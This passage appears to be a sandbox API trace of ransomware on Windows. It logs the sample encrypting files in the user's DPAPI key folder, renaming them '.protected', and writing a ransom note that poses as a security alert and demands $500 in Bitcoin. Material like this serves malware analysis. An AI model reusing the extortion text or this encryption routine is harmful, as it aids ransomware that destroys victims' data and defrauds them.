HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 123 [0090.334] StrStrIW (lpFirst="Preferred", lpSrch=".protected") returned 0x0 [0090.334] lstrcmpW (lpString1="Preferred", lpString2="RESTORE_FILES.txt") returned -1 [0090.334] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.334] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.334] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 123 [0090.334] StrStrW (lpFirst="Preferred", lpSrch=".txt") returned 0x0 [0090.334] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 123 [0090.334] StrStrW (lpFirst="Preferred", lpSrch=".rar") returned 0x0 [0090.334] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 123 [0090.334] StrStrW (lpFirst="Preferred", lpSrch=".zip") returned 0x0 [0090.334] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x18, lpOverlapped=0x0) returned 1 [0090.335] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.335] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x18, lpOverlapped=0x0) returned 1 [0090.335] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.335] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.335] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.335] CloseHandle (hObject=0x150) returned 1 [0090.335] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.protected") returned 133 [0090.335] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.protected")) returned 1 [0090.336] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.336] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.336] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\RESTORE_FILES.txt") returned 131 [0090.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.336] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.336] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.337] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.337] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.337] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.337] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0090.337] CloseHandle (hObject=0x14c) returned 1 [0090.338] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.338] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="Windows") returned -1 [0090.338] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="Program Files") returned 1 [0090.338] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="Program Files (x86)") returned 1 [0090.338] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="$Recycle.bin") returned 1 [0090.338] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="System Volume Information") returned -1 [0090.338] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 114 [0090.338] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2=".") returned 1 [0090.338] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="..") returned 1 [0090.338] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*") returned 116 [0090.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.338] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.338] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.338] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.338] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.338] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.338] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\.") returned 116 [0090.338] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.338] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.339] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.339] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.339] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.339] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.339] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.339] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.339] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.339] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.339] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.339] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\..") returned 117 [0090.339] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.339] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.339] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.339] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.339] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.339] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.339] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.339] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="Windows") returned -1 [0090.339] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="Program Files") returned -1 [0090.339] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="Program Files (x86)") returned -1 [0090.339] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="$Recycle.bin") returned 1 [0090.339] lstrcmpiW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="System Volume Information") returned -1 [0090.339] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c") returned 151 [0090.339] StrStrIW (lpFirst="02540a10-7eb7-4b20-a8c7-470f8986389c", lpSrch=".protected") returned 0x0 [0090.339] lstrcmpW (lpString1="02540a10-7eb7-4b20-a8c7-470f8986389c", lpString2="RESTORE_FILES.txt") returned -1 [0090.339] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.339] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.341] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c") returned 151 [0090.341] StrStrW (lpFirst="02540a10-7eb7-4b20-a8c7-470f8986389c", lpSrch=".txt") returned 0x0 [0090.341] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c") returned 151 [0090.341] StrStrW (lpFirst="02540a10-7eb7-4b20-a8c7-470f8986389c", lpSrch=".rar") returned 0x0 [0090.341] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c") returned 151 [0090.341] StrStrW (lpFirst="02540a10-7eb7-4b20-a8c7-470f8986389c", lpSrch=".zip") returned 0x0 [0090.341] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.341] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.341] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.342] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.342] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.342] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.342] CloseHandle (hObject=0x150) returned 1 [0090.342] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.protected") returned 161 [0090.342] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.protected")) returned 1 [0090.343] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.343] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="Windows") returned -1 [0090.343] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="Program Files") returned -1 [0090.343] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="Program Files (x86)") returned -1 [0090.343] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="$Recycle.bin") returned 1 [0090.343] lstrcmpiW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="System Volume Information") returned -1 [0090.343] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c") returned 151 [0090.344] StrStrIW (lpFirst="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpSrch=".protected") returned 0x0 [0090.344] lstrcmpW (lpString1="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpString2="RESTORE_FILES.txt") returned -1 [0090.344] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.344] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.344] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c") returned 151 [0090.344] StrStrW (lpFirst="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpSrch=".txt") returned 0x0 [0090.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c") returned 151 [0090.344] StrStrW (lpFirst="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpSrch=".rar") returned 0x0 [0090.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c") returned 151 [0090.344] StrStrW (lpFirst="0e15476d-d8fe-46ca-8099-ebdcf80f637c", lpSrch=".zip") returned 0x0 [0090.344] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.345] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.345] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.345] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.345] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.346] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.346] CloseHandle (hObject=0x150) returned 1 [0090.346] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.protected") returned 161 [0090.346] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.protected")) returned 1 [0090.347] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.347] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="Windows") returned -1 [0090.347] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="Program Files") returned -1 [0090.347] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="Program Files (x86)") returned -1 [0090.347] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="$Recycle.bin") returned 1 [0090.347] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="System Volume Information") returned -1 [0090.347] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2") returned 151 [0090.347] StrStrIW (lpFirst="102a7bc8-3f85-4bb4-840a-38257d2965d2", 